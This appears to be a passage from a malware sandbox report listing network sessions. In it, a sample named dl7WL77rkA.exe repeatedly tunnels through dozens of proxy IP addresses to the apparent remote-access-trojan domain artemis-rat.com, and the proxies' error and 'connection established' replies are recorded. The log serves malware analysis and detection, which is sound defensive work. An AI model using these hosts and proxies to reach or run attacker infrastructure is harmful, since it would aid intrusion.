                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.367114067 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            144192.168.2.550312162.241.6.97606513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.212836027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.717333078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.342380047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.592461109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108496904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            145192.168.2.55023343.155.142.116156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.217350960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            146192.168.2.55025546.226.148.105363663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.221811056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.889219046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            147192.168.2.550350188.114.99.37803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.231101990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.385596991 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            148192.168.2.549715154.12.253.232521273876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.236437082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.311126947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.311610937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468137026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.514616013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            149192.168.2.550243156.67.217.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.238276958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.581748009 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            150192.168.2.550241103.199.18.248803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.240852118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.588706970 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 19
                                                                                                                                                                                                                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            151192.168.2.550369172.67.182.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.246907949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.401428938 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            152192.168.2.550266176.99.2.4310813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.260572910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.618627071 CET228INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            153192.168.2.55035112.186.205.120803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.260720968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            154192.168.2.550270103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.266921043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            155192.168.2.550387104.25.114.28803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.267153978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.422607899 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            156192.168.2.550235103.245.109.17280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.293379068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.076740980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.869107008 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            157192.168.2.550334190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.294234037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            158192.168.2.550219124.160.118.18380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.295001030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.693773031 CET323INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.8.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 14:51:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 172
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            159192.168.2.550244171.244.140.160240153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.295208931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            160192.168.2.550360146.19.106.42123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.297991991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            161192.168.2.550251125.99.106.25031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.299532890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:39.233697891 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:42.244882107 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:48.380086899 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:00.668298006 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:24.735054970 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            162192.168.2.550416172.67.254.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.307894945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.462846041 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
